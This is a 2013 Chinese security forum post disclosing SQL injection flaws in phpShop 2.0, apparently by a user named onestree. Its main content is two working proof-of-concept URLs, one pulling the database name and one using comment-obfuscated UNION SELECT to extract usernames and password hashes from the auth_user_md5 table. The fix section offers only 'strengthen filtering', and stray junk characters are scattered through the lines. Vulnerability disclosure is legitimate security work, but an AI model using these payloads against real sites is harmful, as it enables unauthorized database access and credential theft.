找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1943|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability9 E: R% U- }; F. Z; d$ \

8 g2 s% ^. |6 V( |% e& f" Z  f作者 : By onestree
0 f" }% E9 y+ B; k# m下载地址 : http://code.google.com/p/phpshop/downloads/list
0 l/ R) J2 h! q: z6 g6 D测试地址: windows 7 / ubuntu# ]0 b* Z7 n7 D5 }! K

1 q. A+ `3 Z4 z3 F% {$ v
( q; |+ [7 R6 N! y- G: \8 PSQLi p0c:
2 j% P& `; s$ N" n! R8 F; G2 m% B, c
, M1 s2 L7 L: M& ~$ E0 o5 I==================. D  r6 m' ^8 n) R" D

4 G' U4 \0 V: g# ~1 ]http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
7 u( N& `# C2 \  v8 Z( V& U4 Munion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --; W% o$ e* u$ X

( P8 r- V, A; V, y3 thttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
/ D4 u& p4 {) u) P/ v% i  @
* d" i" r# o) Q: F2 p修复:
- i: A$ \4 R3 {: M" Q! I. s加强过滤2 O' X4 F9 a& X$ W( `
+ Y: Y' ^! d4 P' Z- X
) u4 z& M, O6 y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表